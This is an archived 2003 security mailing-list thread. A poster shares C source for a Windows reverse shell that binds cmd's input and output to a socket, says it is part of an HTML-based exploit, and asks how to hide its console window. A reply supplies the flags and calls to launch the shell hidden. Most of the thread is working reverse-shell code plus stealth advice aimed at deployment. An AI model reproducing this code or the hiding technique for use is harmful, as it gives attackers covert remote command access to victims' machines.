Re: freeconsole()

From: sk (sk@scan-associates.net)
Date: 02/28/03

    From: "sk" <sk@scan-associates.net>
    To: "Mike Mires" <poc_sploit@hotmail.com>, <vuln-dev@securityfocus.com>
    Date: Fri, 28 Feb 2003 10:50:12 +0800
    
    

    You may want to try:

    si.dwFlags = STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW;
    FreeConsole();
    CreateProcess(NULL,"cmd",NULL,NULL,1,NULL,NULL,NULL,&si,&pi);

    To make sure the newly created process starts with SW_HIDE.

    sk
    ----- Original Message -----
    From: "Mike Mires" <poc_sploit@hotmail.com>
    To: <pentest@securityfocus.com>
    Cc: <vuln-dev@securityfocus.com>
    Sent: Wednesday, February 26, 2003 6:25 PM
    Subject: freeconsole()

    > Hi all,
    >
    > I am using a basic reverse shell written in C as part of an HTML-based
    > exploit recently revealed by malware.com. It uses WSAStartup() and
    > CreateProcess(). I'm looking for a way to hide the console created by
    > CreateProcess. I've tried freeconsole() with no params as suggested by
    > some sources, however this does not work.
    >
    > Any ideas would be appreciated.
    >
    > Thanks
    >
    > P.S. The code I'm using is
    >
    >
    > #include <winsock2.h>
    > #include <stdio.h>
    > #include <windows.h>
    > #pragma comment(lib,"ws2_32")
    >
    >
    >
    > void main(int argc, char *argv[])
    > {
    > // FreeConsole();
    >
    >
    > WSADATA wsaData;
    > SOCKET hSocket;
    > STARTUPINFO si;
    > PROCESS_INFORMATION pi;
    >
    > struct sockaddr_in adik_sin;
    > memset(&adik_sin,0,sizeof(adik_sin));
    > memset(&si,0,sizeof(si));
    > WSAStartup(MAKEWORD(2,0),&wsaData);
    > hSocket = WSASocket(AF_INET,SOCK_STREAM,NULL,NULL,NULL,NULL);
    > adik_sin.sin_family = AF_INET;
    > adik_sin.sin_port = htons(55);
    > adik_sin.sin_addr.s_addr = inet_addr("127.0.0.1");
    > connect(hSocket,(struct sockaddr*)&adik_sin,sizeof(adik_sin));
    > si.cb = sizeof(si);
    > si.dwFlags = STARTF_USESTDHANDLES;
    > si.hStdInput = si.hStdOutput = si.hStdError = (void *)hSocket;
    >
    > CreateProcess(NULL,"cmd",NULL,NULL,1,NULL,NULL,NULL,&si,&pi);
    >
    >
    >
    > ExitProcess(0);
    >
    > }
    >
    >